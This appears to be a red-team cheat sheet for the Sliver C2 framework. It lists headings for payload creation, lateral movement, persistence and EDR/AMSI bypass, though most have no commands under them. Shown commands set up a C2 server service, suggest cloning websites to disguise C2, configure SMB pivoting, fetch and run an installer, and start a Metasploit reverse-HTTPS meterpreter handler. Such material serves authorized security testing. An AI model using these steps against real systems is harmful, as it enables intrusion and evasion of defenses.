Sliver
Sliver, an open-source cross-platform adversary emulation and red team framework, enables organizations of all sizes to conduct security testing. Sliver implants support various communication channels, including Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS. These implants are dynamically compiled and possess unique X.509 certificates signed by a per-instance certificate authority generated upon initial binary execution. Both Sliver server and client applications run on macOS, Windows, and Linux. Implant compatibility extends to these same operating systems.
Installation
Summary
- Sliver
- Installation
- Summary
- Sliver Service
- Team Server
- Payload Creation
- Post Exploitation
- Internal Reconnaissance
- Privilege Escalation
- Persistence
- Pivoting
- Defense Evasion
- Session Passing
- Misc
Sliver Service
cat > /etc/systemd/system/sliver.service << EOL
[Unit]
Description=Sliver Server
After=syslog.target network.target
[Service]
Type=simple
Restart=always
RestartSec=120
LimitNOFILE=20000
Environment=LANG=en_US.UTF-8
ExecStart=/opt/sliver/sliver-server_linux daemon -l 0.0.0.0 -p <port>
[Install]
WantedBy=multi-user.target
EOL
Restart Deamon & Start Sliver
Install Letsencrypt
Setup Letsencrypt
apt install apache2 -y
certbot certonly --non-interactive --quiet --register-unsafely-without-email --agree-tos -a webroot --webroot-path=/var/www/html -d <domain>
Create a New Website
Clone website with wget.
Add content to HTTP(S) C2 websites to make them look more legit.
Team Server
Create New Operator
Connect to Team Server
Create New Listener
MTLS
HTTPS
HTTPS Domain
HTTP
Payload Creation
Generate Shellcode
Generate Binary
Post Exploitation
Beacon
Sessions
Switching from Beacon Mode to Session Mode
Kill All Session
Lateral Movement
SMB Listener
pivots named-pipe --bind <named_pipe>
profiles new --format service --named-pipe <local_ip>/pipe/<named_pipe> svc-smb-beacon
PSEXEC Lateral Movement
WMI Lateral Movement
Internal Reconnaissance
Situational Awareness - Local
Situational Awareness - Domain
Privilege Escalation
Persistence
Pivoting
Socks Proxy
Defense Evasion
To run this command need to install extension windows-bypass
EDR Bypass
ETW Bypass
AMSI Bypass
Session Passing
Session passing is using one payload to spawn another payload.
Install Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
Setup Metasploit Handler
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set lhost <msf_ip>
set lport <msf_port>
exploit -jz